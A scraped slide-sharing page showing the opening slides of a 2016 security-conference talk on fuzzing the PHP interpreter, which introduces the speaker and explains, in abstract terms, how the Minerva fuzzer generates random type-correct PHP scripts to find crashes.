A Taste of Python - Devdays Toronto 2009A Taste of Python - Devdays Toronto 2009
A Taste of Python - Devdays Toronto 2009
 

Viewers also liked

PLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
PLNOG16: It's time to start 5G - RAPID, Michał SzczęsnyPLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
PLNOG16: It's time to start 5G - RAPID, Michał SzczęsnyPROIDEA
 
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative DesignCE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative DesignPROIDEA
 
[CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego
[CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego [CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego
[CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego PROIDEA
 
[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...
[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...
[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...PROIDEA
 
Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...
Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...
Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...PROIDEA
 
Atmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and Jenkins
Atmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and JenkinsAtmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and Jenkins
Atmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and JenkinsPROIDEA
 
4Developers: Adam Sznajder- Taking advantage of microservice architecture and...
4Developers: Adam Sznajder- Taking advantage of microservice architecture and...4Developers: Adam Sznajder- Taking advantage of microservice architecture and...
4Developers: Adam Sznajder- Taking advantage of microservice architecture and...PROIDEA
 
CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...
CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...
CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...PROIDEA
 
4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity
4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity
4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mityPROIDEA
 
MCE^3 - Marin Todorov - Building Swift Libraries for iOS
MCE^3 - Marin Todorov - Building Swift Libraries for iOSMCE^3 - Marin Todorov - Building Swift Libraries for iOS
MCE^3 - Marin Todorov - Building Swift Libraries for iOSPROIDEA
 
infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...
infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...
infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...PROIDEA
 
4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik
4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik
4developers2016- Strumieniowanie danych w Sparku- Bartosz KowalikPROIDEA
 
InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...
InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...
InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...PROIDEA
 
infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...
infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...
infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...PROIDEA
 
infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...
infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...
infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...PROIDEA
 
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...PROIDEA
 
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...PROIDEA
 

Viewers also liked (17)

PLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
PLNOG16: It's time to start 5G - RAPID, Michał SzczęsnyPLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
PLNOG16: It's time to start 5G - RAPID, Michał Szczęsny
 
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative DesignCE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
CE^3 - Liam Spradlin, Francisco Franco - The Living Interface: Mutative Design
 
[CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego
[CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego [CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego
[CONFidence 2016] Artur Kalinowski - Wyciek danych z pespektywy atakującego
 
[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...
[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...
[CONFidence 2016] Alexander Bolshev, Ivan Yushkevich - When the medicine is m...
 
Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...
Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...
Atmosphere 2016 - Albert Lacki, Jaroslaw Bloch - Real user monitoring at scal...
 
Atmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and Jenkins
Atmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and JenkinsAtmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and Jenkins
Atmosphere 2016 - Adam Walach - Continuous IoT - with Docker, Go and Jenkins
 
4Developers: Adam Sznajder- Taking advantage of microservice architecture and...
4Developers: Adam Sznajder- Taking advantage of microservice architecture and...4Developers: Adam Sznajder- Taking advantage of microservice architecture and...
4Developers: Adam Sznajder- Taking advantage of microservice architecture and...
 
CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...
CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...
CONFidence2015: The (Io)Things you don't even need to hack. Should we worry? ...
 
4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity
4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity
4Developers: Maciej Aniserowicz- O mikroserwisach mikro-fakty i mikro-mity
 
MCE^3 - Marin Todorov - Building Swift Libraries for iOS
MCE^3 - Marin Todorov - Building Swift Libraries for iOSMCE^3 - Marin Todorov - Building Swift Libraries for iOS
MCE^3 - Marin Todorov - Building Swift Libraries for iOS
 
infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...
infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...
infraxstructure: Agata Kowalska "Cloud computing w sektorze finansowym i ube...
 
4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik
4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik
4developers2016- Strumieniowanie danych w Sparku- Bartosz Kowalik
 
InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...
InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...
InfraXstructure: Mirosław Dąbrowski "Zmiany w organizacji a gotowość na meto...
 
infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...
infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...
infraxstructure: Krzysztof Waszkiewicz "Usługi chmurowe dla biznesu wolne od...
 
infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...
infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...
infraxstructure: Krzysztof Szczygieł "Infrastruktura i wyposażenie Data Cent...
 
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
infraxstructure: Robert Mroczkowski "Maszyny się uczą - admińskie rozmówki p...
 
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
infraxstructure: Piotr Jabłoński "SDN w praktyce. Znacząca poprawa bezpieczeń...
 

Similar to [CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

TypeScript Introduction
TypeScript IntroductionTypeScript Introduction
TypeScript IntroductionDmitry Sheiko
 
The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)GroovyPuzzlers
 
Ownership System in Rust
Ownership System in RustOwnership System in Rust
Ownership System in RustChih-Hsuan Kuo
 
Introducción a Elixir
Introducción a ElixirIntroducción a Elixir
Introducción a ElixirSvet Ivantchev
 
talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013ericupnorth
 
Pythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPUPythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPUPaulo Sergio Lemes Queiroz
 
ECMAScript 6 new features
ECMAScript 6 new featuresECMAScript 6 new features
ECMAScript 6 new featuresGephenSG
 
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021Peng Cheng
 
Assignment on Numerical Method C Code
Assignment on Numerical Method C CodeAssignment on Numerical Method C Code
Assignment on Numerical Method C CodeSyed Ahmed Zaki
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeLaurence Svekis ✔
 
Damn Fine CoffeeScript
Damn Fine CoffeeScriptDamn Fine CoffeeScript
Damn Fine CoffeeScriptniklal
 
Numerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learnNumerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learnArnaud Joly
 
NTU ML TENSORFLOW
NTU ML TENSORFLOWNTU ML TENSORFLOW
NTU ML TENSORFLOWMark Chang
 
C# 6.0 - April 2014 preview
C# 6.0 - April 2014 previewC# 6.0 - April 2014 preview
C# 6.0 - April 2014 previewPaulo Morgado
 
Pick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruitPick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruitVaclav Pech
 
Let's build a parser!
Let's build a parser!Let's build a parser!
Let's build a parser!Boy Baukema
 

Similar to [CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter (20)

TypeScript Introduction
TypeScript IntroductionTypeScript Introduction
TypeScript Introduction
 
The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)The groovy puzzlers (as Presented at Gr8Conf US 2014)
The groovy puzzlers (as Presented at Gr8Conf US 2014)
 
Chapter 02 functions -class xii
Chapter 02 functions -class xiiChapter 02 functions -class xii
Chapter 02 functions -class xii
 
Ownership System in Rust
Ownership System in RustOwnership System in Rust
Ownership System in Rust
 
Introducción a Elixir
Introducción a ElixirIntroducción a Elixir
Introducción a Elixir
 
talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013talk at Virginia Bioinformatics Institute, December 5, 2013
talk at Virginia Bioinformatics Institute, December 5, 2013
 
Pythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPUPythonbrasil - 2018 - Acelerando Soluções com GPU
Pythonbrasil - 2018 - Acelerando Soluções com GPU
 
Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2
 
ECMAScript 6 new features
ECMAScript 6 new featuresECMAScript 6 new features
ECMAScript 6 new features
 
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
Shape Safety in Tensor Programming is Easy for a Theorem Prover -SBTB 2021
 
Assignment on Numerical Method C Code
Assignment on Numerical Method C CodeAssignment on Numerical Method C Code
Assignment on Numerical Method C Code
 
JavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your codeJavaScript Advanced - Useful methods to power up your code
JavaScript Advanced - Useful methods to power up your code
 
Damn Fine CoffeeScript
Damn Fine CoffeeScriptDamn Fine CoffeeScript
Damn Fine CoffeeScript
 
Numerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learnNumerical tour in the Python eco-system: Python, NumPy, scikit-learn
Numerical tour in the Python eco-system: Python, NumPy, scikit-learn
 
NTU ML TENSORFLOW
NTU ML TENSORFLOWNTU ML TENSORFLOW
NTU ML TENSORFLOW
 
Intro to Python
Intro to PythonIntro to Python
Intro to Python
 
Matlab algebra
Matlab algebraMatlab algebra
Matlab algebra
 
C# 6.0 - April 2014 preview
C# 6.0 - April 2014 previewC# 6.0 - April 2014 preview
C# 6.0 - April 2014 preview
 
Pick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruitPick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruit
 
Let's build a parser!
Let's build a parser!Let's build a parser!
Let's build a parser!
 

Recently uploaded

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 

[CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

  • 1.
  • 2. Torturing the PHP interpeter Mateusz Kocielski m.kocielski@logicaltrust.net LogicalTrust Confidence Kraków, Poland, May 2016
  • 3. $ whoami pentester at LogicalTrust as $DAYJOB blog: http://akat1.pl, twitter: @akat1 pl open source committer: NetBSD - libsaslc(3) & httpd(8) & security-team@ & random things... security: PHP - CVE-2010-1868, CVE-2010-1917, CVE-2010-4150, CVE-2010-4156, CVE-2011-1938, ... stunnel - CVE-2013-1762 OpenSSH - CVE-2011-0539 Apache - CVE-2014-0117, CVE-2014-0226 FreeBSD - CVE-2015-1414 NetBSD - CVE-2015-8212 ...
  • 4. The hardest part of this talk is... source: http://blog.codinghorror.com/ ...to tell you that I’m a PHP developer.
  • 5. The tortures - master plan source: http://oaklandacupunctureproject.com/wp-content/uploads/2013/12/its-easy.jpg torture identify bugs exploit bugs get profit repeat
  • 6. Minerva Fuzzer fuzzer released at Month of PHP Security in 2010 dedicated to uncover bugs in PHP functions by generating valid random scripts written in Python (around 1000 loc) friendly Beerware license version from 2010 is available here: http://php-security.org/downloads/minerva-1.0.tar.bz2 at some point I’m going to release new version short paper about it: http://php-security.org/2010/05/11/ mops-submission-05-the-minerva-php-fuzzer/index.html
  • 7. Minerva - 5 years later 5 years ago I talked about it at local OWASP meeting (to be specific 4 years and 362 days ago) we released an exploit that was capable of hijacking all requests that were sent to the Apache server ...this time we want to do it again but in the new reality (NX, ASLR’n’stuff turned on by default) we improved our fuzzing process a lot during the last few years slides in Polish: http://www.slideshare.net/logicaltrust/ 201105-owasp-fuzzing-interpretera-php
  • 8. Minerva algorithm - the idea 1. script ← ”” 2. X ← Initial set of variables with their types 3. G ← Fresh variable generator 4. F ← Function database 5. for i in 1..n: 5.1 f ← GET RANDOM(F, X) 5.2 v ← G() 5.3 script ← script . v . ” = ” . f call with random arguments from X (but with proper types) 5.4 X ← X ∪ (v, f result type) 6. return script Erghghg... what?
  • 9. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
  • 10. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
  • 11. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
  • 12. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
  • 13. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
  • 14. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
  • 15. Minerva algorithm - the idea - example F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...} X = ∅ x, y - simple types 1. v1 = A(); X = {x : {v1}} 2. v2 = B(v1, v1); X = {x : {v1, v2}} 3. v3 = C(v2); X = {x : {v1, v2}, y : {v3}} 4. v4 = D(v1, v3); X = {x : {v1, v2}, y : {v3, v4}} 5. v5 = A(); X = {x : {v1, v2, v5}, y : {v3, v4}} 6. ...repeat it until crash
